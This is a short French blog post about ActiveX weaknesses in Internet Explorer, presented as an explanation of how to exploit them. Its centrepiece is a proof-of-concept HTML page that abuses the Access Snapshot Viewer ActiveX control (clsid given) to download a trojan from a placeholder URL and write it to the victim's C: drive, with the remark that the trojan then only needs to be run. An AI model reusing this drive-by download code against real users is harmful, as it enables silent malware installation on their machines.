Déjà plus de 6 ans de patch et activeX est toujours vulnérable sur d'autres formes mais sans compléxités apparentes. Plus qu'une actualité, nous tenterons d'expliquer plus précisement l'exploitation d'une telle faille...
Avant tout, ceci n'est pas une publicité pour quelconques navigateurs (Mais cela peut encore changer :P).
ActiveX est un composant logiciel crée par Microsoft pour son système d'exploitation Windows, afin de permettre le dialogue entre différents programmes.
Grâce à la balise <object>, il est possible d'exécuter ActiveX depuis une page HTML. Avec cela nous avons trois paramètres utiles :
Depuis ça création en 1990 et son adaptation à IE, ActiveX se trouve être la porte aux malwares. En effet, l'ouverture que certains DLL créent peuvent faciliter les hackers à installer leurs bijoux technologiques "Serveurs de Sockets -> Trojans".
Bien évidement Microsoft continu désespérement de le patcher pour protéger ses utilisateurs afin de continuer à vendre (sans aucuns doutes) mais rien y fait...
Voici quelques classid vulnérables en actualité :
Exemple d'infiltration de trojan :
<html> <body> <object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="infiltration"></object> <script language="javascript"> var arbitrary_file = "http://chemin_au_trojan" var dest = "C:/Destination" infiltration.SnapshotPath = arbitrary_file infiltration.CompressedPath = dest infiltration.PrintSnapshot(arbitrary_file,dest) <script> </body> <html>
Plus qu'à exécuter le trojan et activeX ne manque pas de ressources... !
Serrons-nous un jour en sécurité ? Heureusement que des anges veillent sur nous !
Sources :
- Code inspiré de callAX - Microsoft Access Snapshot Viewer ActiveX Exploit
Cette création est mise à disposition sous un contrat Creative Commons